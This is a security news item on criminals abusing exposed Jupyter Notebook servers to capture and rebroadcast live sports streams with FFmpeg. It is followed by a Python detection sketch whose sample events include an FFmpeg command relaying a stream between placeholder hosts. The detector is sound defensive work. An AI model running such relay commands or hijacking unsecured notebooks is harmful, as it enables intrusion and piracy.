Cybercriminals are taking advantage of poorly configured JupyterLab and Jupyter Notebook servers to carry out stream ripping and facilitate sports piracy with live-streaming capture tools. The attackers gain initial access by hijacking unsecured Jupyter Notebooks and then execute a series of actions aimed at illegally streaming sports events. A cloud security firm uncovered this hidden piracy operation after one of its honeypots was targeted. Because Jupyter Notebooks are commonly used for data science, their compromise raises significant concerns.
The attacker first updated the server and then downloaded the FFmpeg tool. The attacker later executed FFmpeg to capture live sports streams and redirect them to their own server. The ultimate objective of the campaign is to download FFmpeg from MediaFire and use it to record live sports broadcasts from the Qatari beIN Sports network. The captured streams are then rebroadcast illegally via ustream[.]tv, which lets the threat actors use compromised Jupyter Notebook servers as intermediaries. They also generate revenue by displaying ads on the unauthorized broadcasts.
The identity of the perpetrators remains unknown, but an IP address linked to the attack (41.200.19.23) suggests a possible connection to Arabic-speaking regions.
Potential risks include denial-of-service, data manipulation, data theft, corruption of AI and ML processes, lateral movement to more critical environments, and, in the worst-case scenario, substantial financial and reputational damage.
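A detection sketch for the chain described above, added here as an example and not taken from the security firm's report: it flags FFmpeg processes that descend from a Jupyter server or kernel and both read from and write to network URLs. The event fields (`pid`, `ppid`, `exe`, `cmdline`), the sample events and the `example.invalid` hosts are constructed assumptions.

```python
import json
import re
import shlex

# Constructed process-execution events (JSON lines); field names are assumptions.
SAMPLE_EVENTS = """\
{"pid": 410, "ppid": 1, "exe": "/usr/bin/python3", "cmdline": "python3 -m jupyterlab --ip=0.0.0.0"}
{"pid": 455, "ppid": 410, "exe": "/usr/bin/python3", "cmdline": "python3 -m ipykernel_launcher -f kernel-1.json"}
{"pid": 470, "ppid": 455, "exe": "/bin/sh", "cmdline": "sh -c 'apt-get update'"}
{"pid": 482, "ppid": 455, "exe": "/tmp/ffmpeg", "cmdline": "/tmp/ffmpeg -i https://source.example.invalid/live.m3u8 -c copy -f flv rtmp://relay.example.invalid/live/key"}
{"pid": 600, "ppid": 1, "exe": "/usr/bin/ffmpeg", "cmdline": "ffmpeg -i /data/in.mp4 /data/out.webm"}
{"pid": 610, "ppid": 455, "exe": "/usr/bin/ffmpeg", "cmdline": "ffmpeg -i /data/clip.mp4 -vf scale=320:-1 /data/thumb.gif"}
"""

NET_URL = re.compile(r"^(https?|rtmps?|rtsp|udp|srt)://", re.I)
JUPYTER = re.compile(r"jupyter|ipykernel", re.I)

def load_events(text):
    """Parse JSON lines into a pid -> event mapping."""
    events = [json.loads(line) for line in text.splitlines() if line.strip()]
    return {e["pid"]: e for e in events}

def has_jupyter_ancestor(pid, by_pid):
    """Walk the parent chain looking for a Jupyter server or kernel process."""
    seen = set()
    pid = by_pid.get(pid, {}).get("ppid")
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        if JUPYTER.search(by_pid[pid]["cmdline"]):
            return True
        pid = by_pid[pid]["ppid"]
    return False

def is_network_relay(cmdline):
    """True when ffmpeg reads from a network URL and writes to a network URL."""
    argv = shlex.split(cmdline)
    if not argv or "ffmpeg" not in argv[0].rsplit("/", 1)[-1]:
        return False
    inputs = [argv[i + 1] for i, a in enumerate(argv[:-1]) if a == "-i"]
    return any(NET_URL.match(u) for u in inputs) and bool(NET_URL.match(argv[-1]))

def find_stream_relays(text=SAMPLE_EVENTS):
    """Return pids of ffmpeg network relays that descend from Jupyter."""
    by_pid = load_events(text)
    return [pid for pid, e in by_pid.items()
            if is_network_relay(e["cmdline"]) and has_jupyter_ancestor(pid, by_pid)]

if __name__ == "__main__":
    print(find_stream_relays())
```

Local-file FFmpeg jobs started from a notebook (pid 610) and network-free FFmpeg runs outside Jupyter (pid 600) are deliberately not flagged, which keeps ordinary data-science use out of the alert.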
© 2021 CyberEnsō – Nihon Cyber Defence Co., Ltd. All Rights Reserved.